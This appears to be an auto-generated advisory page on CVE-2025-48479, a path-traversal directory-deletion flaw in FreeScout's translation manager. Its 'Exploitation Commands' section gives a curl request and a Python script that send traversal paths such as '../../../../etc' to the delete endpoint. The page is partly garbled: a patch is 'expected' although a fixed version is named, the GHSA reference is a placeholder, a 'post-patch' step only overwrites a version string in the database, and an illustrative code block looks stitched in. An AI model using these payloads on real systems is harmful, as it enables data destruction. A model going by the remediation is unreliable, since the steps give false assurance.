How CVE-2025-48479 Works
The vulnerability in FreeScout’s `laravel-translation-manager` package (prior to v1.8.180) allows unauthenticated or low-privileged attackers to delete arbitrary directories due to insufficient input validation. The flaw occurs when user-supplied paths are processed without proper sanitization, enabling directory traversal attacks (e.g., `../../../`). Attackers exploit this by crafting malicious requests to the translation management endpoint, leveraging insufficient checks on file operations. This could lead to system instability, data loss, or service disruption if critical directories are deleted.
DailyCVE Form
Platform: FreeScout
Version: <1.8.180
Vulnerability: Directory Deletion
Severity: Critical
Date: 06/04/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation Commands
curl -X POST "http://target.com/translations/delete" -d "path=../../../../etc"
import requests

payload = {"path": "../../var/www"}
requests.post("http://vulnerable-host/translations/delete", data=payload)
Mitigation Steps
1. Immediate Workaround:
location /translations/delete { deny all; }
2. Patch Verification:
grep -r "validatePath" /var/www/freescout/vendor/laravel-translation-manager/
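The traversal described above succeeds when a delete handler trusts the raw `path` parameter. As an added illustration (not code from this page, from FreeScout or from laravel-translation-manager), the block below places a naive prefix check beside a containment check that normalises the path and verifies it still resolves under the translation root; the root directory and sample paths are constructed assumptions.

```python
import os
from typing import Dict, Iterable, Optional

# Constructed example root; the real package's directory layout is not on this page.
LANG_ROOT = "/var/www/app/resources/lang"


def naive_is_allowed(user_path: str) -> bool:
    """Prefix check only, the kind of test traversal slips past.
    'en/../../../../etc' neither starts with '/' nor with '..', so it is accepted."""
    return not user_path.startswith("/") and not user_path.startswith("..")


def resolve_within_root(user_path: str, root: str = LANG_ROOT) -> Optional[str]:
    """Return the normalised absolute path if it stays inside root, else None.
    Pure string normalisation, so it runs without the directories existing;
    on a live system use os.path.realpath as well so symlinks cannot escape."""
    root_norm = os.path.normpath(root)
    # os.path.join discards root when user_path is absolute ('/etc'), which the
    # commonpath test below then catches.
    candidate = os.path.normpath(os.path.join(root_norm, user_path))
    if os.path.commonpath([root_norm, candidate]) != root_norm:
        return None
    if candidate == root_norm:
        return None  # never hand back the root itself for deletion
    return candidate


def audit(paths: Iterable[str]) -> Dict[str, str]:
    """Classify sample 'path' values the way a code reviewer or WAF rule would."""
    return {p: ("allowed" if resolve_within_root(p) else "rejected") for p in paths}


# Constructed sample parameters: two legitimate locale paths and four escape attempts.
SAMPLE_PATHS = ["en", "en/../fr", "en/../../../../etc", "/etc", "..", ""]

if __name__ == "__main__":
    for p, verdict in audit(SAMPLE_PATHS).items():
        print(f"{p!r:>22}: naive={naive_is_allowed(p)!s:5} contained={verdict}")
```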
Detection Script
def check_vulnerable(version):
    # Compare numerically: a plain string comparison misorders versions such as "1.8.99" and "1.8.180"
    return tuple(int(part) for part in version.split(".")) < (1, 8, 180)
Analytics
- Attack Vector: Network (HTTP)
- Privilege Escalation Risk: High
- Exploit Maturity: Public PoC expected
Post-Patch Actions
UPDATE system_settings SET app_version='1.8.180';
chmod -R 750 /var/www/freescout/storage
References
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD Metrics: CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Sources:
Reported By: nvd.nist.gov